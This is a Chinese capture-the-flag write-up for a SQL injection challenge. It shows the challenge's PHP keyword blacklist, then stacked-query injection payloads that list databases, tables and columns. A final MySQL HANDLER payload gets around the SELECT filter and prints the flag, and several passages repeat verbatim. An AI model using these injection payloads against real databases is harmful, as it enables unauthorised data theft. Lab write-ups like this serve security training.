启动挑战项目,发现前端界面显示Black list is so weak for you,isn’t it
随便输入几个关键词试试:select
,他爆出来所有的黑名单关键词,本来还想fuzz跑一下的
return preg_match(\"/set|prepare|alter|rename|select|update|delete|drop|insert|where|\\./i\",$inject);return preg_match(\"/set|prepare|alter|rename|select|update|delete|drop|insert|where|\\./i\",$inject);return preg_match(\"/set|prepare|alter|rename|select|update|delete|drop|insert|where|\\./i\",$inject);
联合注入不行,就尝试尝试堆叠查询
,看来CTF也很喜欢考这类型的题目呀!
首先爆出数据库:1\';show databases;
array(1) {[0]=>string(11) \"ctftraining\"}array(1) {[0]=>string(18) \"information_schema\"}array(1) {[0]=>string(5) \"mysql\"}array(1) {[0]=>string(18) \"performance_schema\"}array(1) {[0]=>string(9) \"supersqli\"}array(1) {[0]=>string(4) \"test\"}array(1) { [0]=> string(11) \"ctftraining\" } array(1) { [0]=> string(18) \"information_schema\" } array(1) { [0]=> string(5) \"mysql\" } array(1) { [0]=> string(18) \"performance_schema\" } array(1) { [0]=> string(9) \"supersqli\" } array(1) { [0]=> string(4) \"test\" }array(1) { [0]=> string(11) \"ctftraining\" } array(1) { [0]=> string(18) \"information_schema\" } array(1) { [0]=> string(5) \"mysql\" } array(1) { [0]=> string(18) \"performance_schema\" } array(1) { [0]=> string(9) \"supersqli\" } array(1) { [0]=> string(4) \"test\" }
接着爆出表名:1\';show tables;
array(1) {[0]=>string(8) \"FlagHere\"}array(1) {[0]=>string(5) \"words\"}array(1) { [0]=> string(8) \"FlagHere\" } array(1) { [0]=> string(5) \"words\" }array(1) { [0]=> string(8) \"FlagHere\" } array(1) { [0]=> string(5) \"words\" }
然后查询列表信息:1\';show columns from FlagHere;
array(6) {[0]=>string(4) \"flag\"[1]=>string(12) \"varchar(100)\"[2]=>string(2) \"NO\"[3]=>string(0) \"\"[4]=>NULL[5]=>string(0) \"\"}array(6) { [0]=> string(4) \"flag\" [1]=> string(12) \"varchar(100)\" [2]=> string(2) \"NO\" [3]=> string(0) \"\" [4]=> NULL [5]=> string(0) \"\" }array(6) { [0]=> string(4) \"flag\" [1]=> string(12) \"varchar(100)\" [2]=> string(2) \"NO\" [3]=> string(0) \"\" [4]=> NULL [5]=> string(0) \"\" }
接下来的才是重点,在MYSQL数据库中:
- 可以用handler 【表名】 open来打开某个表
- 然后就可以在里面用handler 【表名】 read 【获取第几行】来获取该数据库里面的数据了
- 最后再利用handler【表名】 close来关闭
所以根据已知的信息可以构造payload为:
1\';handler FlagHere open;handler FlagHere read first;handler FlagHere close;1\'; handler FlagHere open; handler FlagHere read first; handler FlagHere close;1\'; handler FlagHere open; handler FlagHere read first; handler FlagHere close;
array(1) {[0]=>string(42) \"flag{bc0dd949-5b62-41c7-85c5-95662641a510}\"}array(1) { [0]=> string(42) \"flag{bc0dd949-5b62-41c7-85c5-95662641a510}\" }array(1) { [0]=> string(42) \"flag{bc0dd949-5b62-41c7-85c5-95662641a510}\" }
最终获得flag为flag{bc0dd949-5b62-41c7-85c5-95662641a510}
THE END
暂无评论内容